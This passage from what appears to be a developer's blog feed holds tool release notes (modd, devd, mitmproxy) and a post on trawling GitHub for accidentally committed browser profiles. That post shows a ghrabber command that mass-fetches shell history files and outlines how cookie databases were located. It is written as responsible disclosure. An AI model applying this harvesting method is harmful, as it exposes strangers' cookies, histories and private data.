The output of the change detection algorithm is then hooked\nup to a very flexible way to specify commands and manage daemons, letting you\nspecify shell scripts that trigger on file match patterns in a single config\nfile. Finally, there are a few mod-cons. A custom <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/termlog\">terminal logging\nmodule<\/a> lets modd sensibly interleave the\noutput of possibly concurrent daemons and commands, with headings showing which\ncommand was responsible for what. Modd also has support for desktop\nnotifications (<a rel=\"external\" href=\"http:\/\/growl.info\/\">Growl<\/a> on OSX,\n<a rel=\"external\" href=\"https:\/\/developer.gnome.org\/libnotify\/\">libnotify<\/a> on Linux), letting you see\nthings like linter output and compile errors immediately.<\/p>\n<p>Below, I'm going to show one quick example of how I use modd to do a live\nbuild\/compile cycle for <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">devd<\/a>, a pretty\nstandard Go project. In a future post, I'll show how I've replaced Gulp\nentirely for a JavaScript-heavy front-end project.<\/p>\n<p>Please see the <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/modd\">modd documentation<\/a> for a\ncomplete explanation of the syntax and for more examples.<\/p>\n<h2 id=\"test-compile-cycle-for-go\">Test-compile cycle for Go<\/h2>\n<p>On startup, modd looks for a file called <em>modd.conf<\/em> in the current directory.\nThis file has a simple but powerful syntax - one or more blocks of commands,\neach of which can be triggered on changes to files matching a set of file\npatterns. Commands have two flavors: <strong>prep<\/strong> commands that run and terminate\n(e.g. compiling, running test suites or running linters), and <strong>daemon<\/strong>\ncommands that run and keep running (e.g. databases or webservers). Daemons are\nrestarted when their block is triggered, after all prep commands have run\nsuccessfully. 
Commands are embedded shell scripts, so shell features like\nredirection work, and compound, multi-step commands are common.<\/p>\n<p>Here is the simple <strong>modd.conf<\/strong> I use to drive the test cycle for\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">devd<\/a>:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>**\/*.go {<\/span><\/span>\n<span class=\"giallo-l\"><span>    prep: go test @dirmods<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span>**\/*.go !**\/*_test.go {<\/span><\/span>\n<span class=\"giallo-l\"><span>    prep: go install .\/cmd\/devd<\/span><\/span>\n<span class=\"giallo-l\"><span>    daemon +sigterm: devd -ml .\/tmp<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>After the <em>modd<\/em> command, the commands execute for the first time, and modd is\nthen ready to respond to changes. The initial output looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"modd-devd.png\">\n        <img src=\"modd-devd.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The config file does three things:<\/p>\n<ul>\n<li>When any .go file changes, it runs \"go test\" on the affected module.<\/li>\n<li>When a non-test file changes, it compiles and installs devd.<\/li>\n<li>It keeps a test instance of the devd daemon running, and restarts it with a\nSIGTERM when needed.<\/li>\n<\/ul>\n<p>The one subtlety here is the <strong>@dirmods<\/strong> tag, which is replaced with a\nshell-escaped list of all directories that contain modified files. There's a\nsimilar tag - <strong>@mods<\/strong> - that is replaced with all matching modified files.\nWhen first run, both of these tags are replaced by all possible matches - that\nis, all directories containing matching files, and all matching files\nrespectively. 
This means that the test suite for all the Go modules in the\nproject is run on startup, and only for modified modules after that.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>In fact, this is <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/modd\/blob\/master\/CHANGELOG.md\">release\nv0.2<\/a>, which slipped\nin before I had time to announce v0.1 on my blog.<\/p>\n<\/div>\n"},{"title":"mitmproxy v0.15","published":"2015-12-04T00:00:00+00:00","updated":"2015-12-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_15\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_15\/","content":"<div class=\"media\">\n    <a href=\"http:&#x2F;&#x2F;mitmproxy.org\">\n        <img src=\"..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We've just released <a rel=\"external\" href=\"http:\/\/www.mitmproxy.org\">mitmproxy 0.15<\/a>. This is\nprimarily a bugfix release, but with a few really juicy long-demanded features\nthrown in:<\/p>\n<ul>\n<li>Support for loading and converting older dumpfile formats (0.13 and up)<\/li>\n<li>Content views for inline script (@chrisczub)<\/li>\n<li>Better handling of empty header values (Benjamin Lee\/@bltb)<\/li>\n<li>Fix a gnarly memory leak in mitmdump<\/li>\n<li>A number of bugfixes and small improvements<\/li>\n<\/ul>\n<p>Behind the scenes, there has been a bunch of other exciting developments. The\neffort to port mitmproxy and its underlying libraries to Python3 continues\napace. 
Our automated build and testing infrastructure has improved hugely - we\nnow have <a rel=\"external\" href=\"http:\/\/snapshots.mitmproxy.org\">up-to-date binary snapshots built for each\ncommit<\/a>.<\/p>\n<p>Thanks to all the contributors who helped get this release out the door, and,\nas usual, special thanks to my invaluable co-maintainer\n<a rel=\"external\" href=\"https:\/\/maximilianhils.com\/\">Max<\/a>, who's been steering things while I've been\nkept busy with other things.<\/p>\n"},{"title":"Trawling Github for cookies, bookmarks and browsing history","published":"2015-11-26T00:00:00+00:00","updated":"2015-11-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/hacks\/github-browserstate\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/hacks\/github-browserstate\/","content":"<p>It's a universal rule that search over a sufficiently large body of user data\nposes security challenges. This follows naturally from the fact that humans -\neven smart, informed, careful humans - occasionally slip up. Given enough data,\nand the ability to pick out slip-ups with search, there will always be rich\npickings for a malefactor. I wrote a short series of posts a while ago about\ninteresting things I found on Github - <a href=\"https:\/\/corte.si\/posts\/hacks\/github-shhistory\/\">commands from shell history\nfiles<\/a>, <a href=\"https:\/\/corte.si\/posts\/hacks\/github-pipechains\/\">common pipe\nchains<\/a>, and words from <a href=\"https:\/\/corte.si\/posts\/hacks\/github-spellingdicts\/\">custom\nspell-check dictionaries<\/a>. While\nshell history files could definitely contain very sensitive information, in\npractice there were only a handful of really damaging issues in the dataset.\nTrawling around people's dotfile directories, I found that something much more\ndamaging often made it into repos: browser state. 
It's easy to see how this\ncould happen - it takes just one injudicious add of a hidden directory to\nexpose cookies, browser history, bookmarks and more. I decided to return to\nthis issue later, and it slipped off my radar until recently.<\/p>\n<p>When I wrote the first series of posts, I also released a <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\">tiny tool called\nghrabber<\/a> (just a hack, really) that lets\nyou grab files from Github en masse using a Github code search query. The first\nthing I noticed when I picked it up again is that it no longer worked as\nexpected. I used to be able to retrieve all files matching a path, like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    ghrabber.py<\/span><span style=\"color: #032F62;\"> &quot;path:.bash_history&quot;<\/span><\/span><\/code><\/pre>\n<p>Today, this returns an error - Github now requires you to specify both a search\nterm <strong>and<\/strong> a path<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup>. There are all sorts of possible explanations for this\nchange, but I like to think that it's meant to prevent (or at least impede)\nexactly the kind of trawling I've been amusing myself with.<\/p>\n<p>Let's say we want to search for Firefox browser profile cookies. These are\nstored in a SQLite file called \"cookies.sqlite\". Github doesn't index binary files\nfor search, so we can't search for characteristic content in the file. Path\nspecification is broken, so we can't search for the filename. Stumped, right?\nNot so fast - the cookie files live in a directory with a large number of\nassociated non-binary files. If we could come up with a signature for one of\nthese accompanying files, then we could download a path relative to the match\nto retrieve the cookie storage file itself. 
I quickly <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\/commit\/9b7909ccd594168ab8eb3d44834055b510e90273\">added a flag to do\nexactly this to\nghrabber<\/a>,\nand cooked up appropriate query strings to detect Firefox and Chrome browser\nprofiles. I'll elide those here, for obvious reasons.<\/p>\n<h2 id=\"a-look-at-the-data\">A look at the data<\/h2>\n<p>The result was <strong>708<\/strong> distinct browser profiles that included <strong>33 364<\/strong>\nbookmarks, and <strong>88 013<\/strong> cookies. Many of these profiles are actually\nintentional checkins - testing trusses, blank profiles and so forth. However,\nsome totally unscientific manual sampling indicates that just less than half of\nthese are probably genuine accidental checkins, containing private information.<\/p>\n<p>Let's take a light, high-level look at the data. The figure below shows the\npercentage of profiles with cookies from each TLD:<\/p>\n<figure>\n    <img class=\"img-responsive center-block\" src=\".\/cookies.png\"\/>\n    <figcaption class=\"text-center\">Percentage of profiles with cookies from domain<\/figcaption>\n<\/figure>\n<p>As expected, the stats here are dominated by the mega-trackers that infest\nalmost every site on the internet - a familiar cast of rogues including\nDoubleClick, Scorecard Research, Quantserve and so forth. It's sad to see how\nfew domains here are genuine destinations - apparently the top sites for this\nsample are Google, YouTube, Github (not unexpectedly), and Twitter.<\/p>\n<p>Next up is the percentage of profiles with bookmarks for a given domain:<\/p>\n<figure>\n    <img class=\"img-responsive center-block\" src=\".\/bookmarks.png\"\/>\n    <figcaption class=\"text-center\">Percentage of profiles with bookmarks for domain<\/figcaption>\n<\/figure>\n<p>Here, the top domains are those pre-seeded on install, particularly with\nFirefox. This explains the Mozilla domains as well as ubuntu.com, debian.org\nand launchpad.net. 
Once we're outside of this list, the \"genuine destinations\"\nmatch the cookie dataset quite well - YouTube, Github, Wikipedia, and so forth.<\/p>\n<h2 id=\"a-difficult-situation\">A difficult situation<\/h2>\n<p>The surprise here is not that people accidentally check sensitive information\ninto git repos. The real surprise is just how much of a pain in the butt it was\nto responsibly address the issue. At the end of this little experiment, I had\nmore than 700 repositories that potentially contained sensitive, accidentally\nexposed user information. It beggars belief, but it's 2015 and the most popular\nrepository hosting service in the world <a rel=\"external\" href=\"https:\/\/github.com\/isaacs\/github\/issues\/37\">has <strong>no way<\/strong> to privately report a\nbug against a repo<\/a>. One could\ncreate a public bug report for each repository in question - but that would be\nlike hanging out a neon sign saying \"privacy issue here\" for others to find,\nparticularly since bug reports are published in a user's activity stream.<\/p>\n<p>In the end, I decided to directly notify as many people as I could by email.\nSo, I wrote a script that checked each affected user's profile for an email\naddress. That left me with 120-odd users with contact details. I manually\nwhittled these down to repositories that were obviously accidental checkins and\nsent them each an email, resulting in a dozen or so responses with variations\non \"oops, thanks for letting me know\".<\/p>\n<h2 id=\"hey-github\">Hey Github!<\/h2>\n<p>I have two recommendations for Github that would make this situation vastly,\nvastly better:<\/p>\n<ul>\n<li>\n<p>Add a mechanism that lets users report private bugs, visible only to the repo\nowners. There's just no excuse for the lack of a feature like this.<\/p>\n<\/li>\n<li>\n<p>Consider restricting search functionality somewhat. 
One option would be not\nto index dotfiles (.*) by default, and perhaps let users opt in to dotfile\nindexing on a per-repo basis. The vast majority of accidental checkins are\neither within dotfiles (shell history, for example), or within directories\nthat start with leading dots (browser history, ssh config).<\/p>\n<\/li>\n<\/ul>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>In fact, Github search path specifications seem to be broken now in a\nmore general way, but that's beside the point for this post.<\/p>\n<\/div>\n"},{"title":"devd v0.3","published":"2015-11-12T00:00:00+00:00","updated":"2015-11-12T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/devd\/0.3\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/devd\/0.3\/","content":"<div class=\"media\">\n    <a href=\"https:&#x2F;&#x2F;github.com&#x2F;cortesi&#x2F;devd\">\n        <img src=\"..&#x2F;intro&#x2F;devd-terminal.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\/releases\">devd 0.3<\/a> - a\nmeasured increment, with a modest set of bugfixes and new features. This is\nin line with my <a href=\"https:\/\/corte.si\/posts\/devd\/0.2\/\">broad plan to keep devd a small, dependable, and focused\ntool.<\/a> Everyone should update.<\/p>\n<ul>\n<li>-s (--tls) Generate a self-signed certificate, and enable TLS. The cert\nbundle is stored in ~\/.devd.cert<\/li>\n<li>Add the X-Forwarded-Host header to reverse proxied traffic.<\/li>\n<li>Disable upstream cert validation for reverse proxied traffic. This makes\nusing self-signed certs for development easy. 
Devd shouldn't be used in\ncontexts where this might pose a security risk.<\/li>\n<li>Bugfix: make CSS livereload work in Firefox<\/li>\n<li>Bugfix: make sure the Host header and SNI host match for reverse proxied\ntraffic.<\/li>\n<\/ul>\n"},{"title":"mitmproxy: release v0.14","published":"2015-11-07T00:00:00+00:00","updated":"2015-11-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_14\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_14\/","content":"<div class=\"media\">\n    <a href=\"https:&#x2F;&#x2F;mitmproxy.org\">\n        <img src=\"..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We've just released <a rel=\"external\" href=\"http:\/\/www.mitmproxy.org\">mitmproxy 0.14<\/a>! Since the last\nrelease, the project has had 399 commits by 13 contributors, resulting in 79\nclosed issues and 37 closed PRs, all of this in just over 100 days.<\/p>\n<ul>\n<li>Docs: Greatly updated docs <a rel=\"external\" href=\"http:\/\/docs.mitmproxy.org\">now hosted on ReadTheDocs<\/a><\/li>\n<li>Docs: Fixed Typos, updated URLs etc. (Nick Badger, Ben Lerner, Choongwoo Han,\nonlywade, Jurriaan Bremer)<\/li>\n<li>mitmdump: Colorized TTY output<\/li>\n<li>mitmdump: Use mitmproxy's content views for human-readable output (Chris Czub)<\/li>\n<li>mitmproxy and mitmdump: Support for displaying UTF8 contents<\/li>\n<li>mitmproxy: add command line switch to disable mouse interaction (Timothy Elliott)<\/li>\n<li>mitmproxy: bug fixes (Choongwoo Han, sethp-jive, FreeArtMan)<\/li>\n<li>mitmweb: bug fixes (Colin Bendell)<\/li>\n<li>libmproxy: Add ability to fall back to TCP passthrough for non-HTTP connections.<\/li>\n<li>libmproxy: Avoid double-connect in case of TLS Server Name Indication. 
This\nyields a massive speedup for TLS handshakes.<\/li>\n<li>libmproxy: Prevent unnecessary upstream connections (macmantrl)<\/li>\n<li>Inline Scripts: New <a rel=\"external\" href=\"http:\/\/docs.mitmproxy.org\/en\/latest\/dev\/models.html#netlib.http.Headers\">API for HTTP\nHeaders<\/a><\/li>\n<li>Inline Scripts: Properly handle exceptions in <code>done<\/code> hook<\/li>\n<li>Inline Scripts: Allow relative imports, provide <code>__file__<\/code><\/li>\n<li>Examples: Add probabilistic TLS passthrough as an inline script<\/li>\n<li>netlib: Refactored HTTP protocol handling code<\/li>\n<li>netlib: ALPN support<\/li>\n<li>netlib: fixed a bug in the optional certificate verification.<\/li>\n<li>netlib: Initial Python 3.5 support (this is the first prerequisite for 3.x support in mitmproxy)<\/li>\n<\/ul>\n<p>I had very little time to spend on mitmproxy this cycle due to an\nextraordinarily busy patch at work - so, all of the above was shepherded into\nbeing by my hyper-efficient co-maintainer, <a rel=\"external\" href=\"https:\/\/maximilianhils.com\/\">Maximilian\nHils<\/a>. Having a steady pair of hands to keep\nthings on track while I've been \"absent\" has been great. As a project, we'd\nalso like to thank Google, who sponsored the work of <a rel=\"external\" href=\"https:\/\/github.com\/Kriechi\">Thomas\nKriechbaumer<\/a> under the <a rel=\"external\" href=\"https:\/\/developers.google.com\/open-source\/soc\/\">Google Summer of\nCode<\/a> program, and the\n<a rel=\"external\" href=\"https:\/\/www.honeynet.org\/\">Honeynet Project<\/a> under whose aegis the GSoC work\nwas done. The excellent work Thomas has done on HTTP2 support and many, many\nother aspects of mitmproxy has been invaluable. 
Look for new releases building\non this soon.<\/p>\n"},{"title":"devd v0.2 (and some thoughts on small tools)","published":"2015-11-05T00:00:00+00:00","updated":"2015-11-05T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/devd\/0.2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/devd\/0.2\/","content":"<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\/releases\">version 0.2 of\ndevd<\/a>, a local webserver for\ndevelopers. This release contains a number of small improvements, and a few new\nfeatures.<\/p>\n<ul>\n<li>-x (--exclude) flag to exclude files from livereload.<\/li>\n<li>-P (--password) flag for quick HTTP Basic password protection.<\/li>\n<li>-q (--quiet) flag to suppress all output from devd.<\/li>\n<li>Humanize file sizes in console logs.<\/li>\n<li>Improve directory indexes - better formatting, they now also livereload.<\/li>\n<li>Devd's built-in livereload URLs are now less likely to clash with user URLs.<\/li>\n<li>Internal 404 pages are now included in logs, timing measurement, and\nfiltering.<\/li>\n<li>Improved heuristics for livereload file change detection. We now handle\nthings like transient files created by editors better.<\/li>\n<li>A Linux ARM build will now be distributed with each release.<\/li>\n<\/ul>\n<p>Thanks to <a rel=\"external\" href=\"http:\/\/brennie.ca\">Barret Rennie<\/a>, <a rel=\"external\" href=\"http:\/\/billmill.org\">Bill Mill<\/a>\nand Judson Mitchell (<a href=\"mailto:judsonmitchell@gmail.com\">judsonmitchell@gmail.com<\/a>) for contributing to this\nrelease.<\/p>\n<h1 id=\"some-thoughts-on-small-tools\">Some thoughts on small tools<\/h1>\n<p>I love small, modest tools that do one thing well. I wrote devd partly out of\nnostalgia for <a rel=\"external\" href=\"http:\/\/acme.com\/software\/thttpd\/\">thttpd<\/a>, a tiny web daemon that\nused to be my rough-and-ready, just-serve-files-now webserver for many years. 
It\nwas a single, small binary that I could cross-compile for all the platforms I\nused, and it did its humble job well. Back in the day, it was one of the first\nthings I put on every new box, along with my shell configuration and ssh keys.\nWhen it started showing its age, I moved on to the usual combination of built-in\ninterpreter daemons (e.g. \"python -m SimpleHTTPServer\") and more heavy-handed\ntools, but not without a touch of sadness. Looking back on it now, it's clear\nthat the thttpd I remember is a somewhat rose-tinted version of the real thing:\nthttpd actually did both more and less than I really needed. Devd strives to be\na tool in the same spirit, that matches more closely what I want in my\n<a rel=\"external\" href=\"https:\/\/en.wikipedia.org\/wiki\/Everyday_carry\">EDC<\/a> http daemon. If people think\nof it as a small, dependable and unobtrusive part of their daily toolset, I'll\nhave done <em>my<\/em> job well.<\/p>\n<p>This release includes a few new features for devd, and the next release will add\na few more. Not long after that, I expect it to be more or less feature\ncomplete. It will continue to improve internally, and bugs will always be fixed,\nbut it will never sprout the ability to run PHP or render less on the fly (both\nfeature requests I've had since the first release). Instead, it will focus on\ndoing the few things it does as well as it can: serve files, act as a reverse\nproxy tying development servers together, and live reload when files change.<\/p>\n"},{"title":"devd: a web daemon for developers","published":"2015-10-23T00:00:00+00:00","updated":"2015-10-23T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/devd\/intro\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/devd\/intro\/","content":"<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">devd<\/a>, a small,\nself-contained, command-line-only HTTP server for developers. 
It started as a\nweekend stress-relief hack (that's a thing where I'm from), but has now become\nmy preferred \"daily driver\" for most web-ish things. It's simple, direct and\ndoes more or less exactly what I need. This isn't terribly surprising, since I\nwrote it to scratch my own idiosyncratic itch - hopefully other, similarly itchy\nhackers will find it useful too.<\/p>\n<h2 id=\"quick-start\">Quick start<\/h2>\n<p>Serve the current directory, open it in the browser (<strong>-o<\/strong>), and livereload\nwhen files change (<strong>-l<\/strong>):<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -ol<\/span><span style=\"color: #032F62;\"> .<\/span><\/span><\/code><\/pre>\n<p>Reverse proxy to http:\/\/localhost:8080, and livereload when any file in the\n<strong>src<\/strong> directory changes:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -w<\/span><span style=\"color: #032F62;\"> .\/src http:\/\/localhost:8080<\/span><\/span><\/code><\/pre><h2 id=\"features\">Features<\/h2>\n<h3 id=\"cross-platform-and-self-contained\">Cross-platform and self-contained<\/h3>\n<p>Devd is a single statically compiled binary with no external dependencies, and\nis released for OSX, Linux and Windows. Don't want to install Node or Python in\nthat light-weight Docker instance you're hacking in? Just copy over the devd\nbinary and be done with it.<\/p>\n<h3 id=\"designed-for-the-terminal\">Designed for the terminal<\/h3>\n<p>This means no config file, no daemonization, and logs that are designed to be\nread in the terminal by a developer. Logs are colorized and log entries span\nmultiple lines. 
Devd's logs are detailed, warn about corner cases that other\ndaemons ignore, and can optionally include things like detailed timing\ninformation and full headers.<\/p>\n<div class=\"media\">\n    <a href=\"https:&#x2F;&#x2F;github.com&#x2F;cortesi&#x2F;devd\">\n        <img src=\".&#x2F;devd-terminal.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>To make quickly firing up an instance as simple as possible, devd automatically\nchooses an open port to run on (unless it's specified), and can open a browser\nwindow pointing to the daemon root for you (the <strong>-o<\/strong> flag in the example\nabove).<\/p>\n<h3 id=\"livereload\">Livereload<\/h3>\n<p>When livereload is enabled, devd injects a small script into HTML pages, just\nbefore the closing <em>head<\/em> tag. The script listens for change notifications over\na websocket connection, and reloads resources as needed. No browser addon is\nrequired, and livereload works even for reverse proxied apps. If only changes\nto CSS files are seen, devd will only reload external CSS resources, otherwise\na full page reload is done. This serves the current directory with livereload\nenabled:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -l<\/span><span style=\"color: #032F62;\"> .<\/span><\/span><\/code><\/pre>\n<p>You can also trigger livereload for files that are not being served, letting\nyou reload reverse proxied applications when source files change. 
So, this\ncommand watches the <em>src<\/em> directory tree, and reverse proxies to a locally\nrunning application:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -w<\/span><span style=\"color: #032F62;\"> .\/src http:\/\/localhost:8888<\/span><\/span><\/code><\/pre><h3 id=\"reverse-proxy-static-file-server-flexible-routing\">Reverse proxy + static file server + flexible routing<\/h3>\n<p>Modern apps tend to be collections of web servers, and devd caters for this\nwith flexible reverse proxying. You can use devd to overlay a set of services\non a single domain, add livereload to services that don't natively support it,\nadd throttling and latency simulation to existing services, and so forth.<\/p>\n<p>Here's a more complicated example showing how all this ties together - it\noverlays two applications and a tree of static files. 
Livereload is enabled for\nthe static files (<strong>-l<\/strong>) and also triggered whenever source files for reverse\nproxied apps change:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -l \\<\/span><\/span>\n<span class=\"giallo-l\"><span>-w<\/span><span style=\"color: #032F62;\"> .\/src\/<\/span><span style=\"color: #005CC5;\"> \\<\/span><\/span>\n<span class=\"giallo-l\"><span>\/=http:\/\/localhost:8888<\/span><span style=\"color: #005CC5;\"> \\<\/span><\/span>\n<span class=\"giallo-l\"><span>\/api\/=http:\/\/localhost:8889<\/span><span style=\"color: #005CC5;\"> \\<\/span><\/span>\n<span class=\"giallo-l\"><span>\/static\/=.\/assets<\/span><\/span><\/code><\/pre><h3 id=\"light-weight-virtual-hosting\">Light-weight virtual hosting<\/h3>\n<p>Devd uses a dedicated domain - <strong>devd.io<\/strong> - to do simple virtual hosting. This\ndomain and all its subdomains resolve to 127.0.0.1, which we use to set up\nvirtual hosting without any changes to <em>\/etc\/hosts<\/em> or other local\nconfiguration. Route specifications that don't start with a leading <strong>\/<\/strong> are\ntaken to be subdomains of <strong>devd.io<\/strong>. 
So, the following command serves a\nstatic site from devd.io, and reverse proxies a locally\nrunning app on api.devd.io:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #032F62;\"> .\/static api=http:\/\/localhost:8888<\/span><\/span><\/code><\/pre>\n<p>Check out the docs at <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">the Github repo<\/a> for\nthe full route specification syntax.<\/p>\n<h3 id=\"latency-and-bandwidth-simulation\">Latency and bandwidth simulation<\/h3>\n<p>Want to know what it's like to use your fancy 5mb HTML5 app from a mobile phone\nin Botswana? Look up the bandwidth and latency\n<a rel=\"external\" href=\"http:\/\/www.cisco.com\/c\/en\/us\/solutions\/collateral\/service-provider\/global-cloud-index-gci\/CloudIndex_Supplement.html\">here<\/a>,\nand invoke devd like so (making sure to convert from kilobits per second to\nkilobytes per second):<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -d 114 -u 51 -l 75<\/span><span style=\"color: #032F62;\"> .<\/span><\/span><\/code><\/pre>\n<p>Devd tries to be reasonably accurate in simulating bandwidth and latency - it\nuses a token bucket implementation for throttling, properly handles concurrent\nrequests, and chunks traffic up so data flow is smooth.<\/p>\n"},{"title":"mitmproxy: release v0.13","published":"2015-07-26T00:00:00+00:00","updated":"2015-07-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_13\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_13\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif\">\n        <img 
src=\"..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This is a slightly late announcement of the release of <a rel=\"external\" href=\"https:\/\/mitmproxy.org\">mitmproxy\nv0.13<\/a>, which was pushed out the door earlier this week\nby my esteemed compatriots while I was tied up with other things. We have a\nnumber of big new features this time round. First, mitmproxy now has upstream\ncertificate validation, thanks to the hard work of <a rel=\"external\" href=\"https:\/\/github.com\/kyle-m\">Kyle\nMorton<\/a>. Mitmproxy is increasingly being used in\nuser-oriented roles where upstream cert validation is crucial, so this is a\nwelcome improvement. We also have a new transparent proxy mode, which uses the\nHTTP Host headers to detect the upstream server to connect to, rather than the\nOS NAT tables. This isn't accurate 100% of the time, but it's so convenient\nthat having it in the base makes sense. Thanks to\n<a rel=\"external\" href=\"https:\/\/github.com\/ijiro123\">Ijiro123<\/a>. Other improvements include\nmarking of flows in mitmproxy console (thanks to <a rel=\"external\" href=\"https:\/\/github.com\/drahosj\">Jake\nDrahos<\/a>) and an addition to the filter language\nallowing better matching of source and destination addresses (thanks to <a rel=\"external\" href=\"https:\/\/github.com\/isra17\">Israel\nHalle<\/a>).<\/p>\n<p>This release also features something a bit more unusual: a removed feature. We\nadded the ability to forward server certificates through to the client verbatim\nto allow mitmproxy to exploit the infamous\n<a rel=\"external\" href=\"https:\/\/www.imperialviolet.org\/2014\/02\/22\/applebug.html\">#gotofail<\/a> bug on IOS\nand OSX. We were one of the first (and perhaps THE first) publicly available\nmechanisms to exploit this issue, and pen testers, app reversers and curious\nfolks everywhere rejoiced. 
Unfortunately, cert forwarding has become a support\nburden - for fiddly technical reasons, it adds a lot of complication to the way\nmitmproxy is distributed and installed. Since #gotofail is no longer so\ncurrent, we've decided to remove support from mitmproxy. If you still have some\nvulnerable devices out there you need to muck with, the official answer at the\nmoment is to install v0.12.<\/p>\n"},{"title":"mitmproxy v0.12.1","published":"2015-06-04T00:00:00+00:00","updated":"2015-06-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_12_1\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_12_1\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_12_1.gif\">\n        <img src=\"mitmproxy_0_12_1.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just released <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy v0.12.1<\/a>. This release\nfixes a few crashing bugs that slipped through in the previous iteration, so\neveryone should upgrade.<\/p>\n<p>Also included are a number of small improvements. The most noticeable of these\nis mouse interaction for mitmproxy console - the screen capture above shows me\nscrolling with my mouse, clicking to view a flow and switch tabs. We pay a\nsmall price for this - users now have to hold down a modifier key (shift on\nsome systems, alt on others) to select text in the terminal for copying and\npasting. 
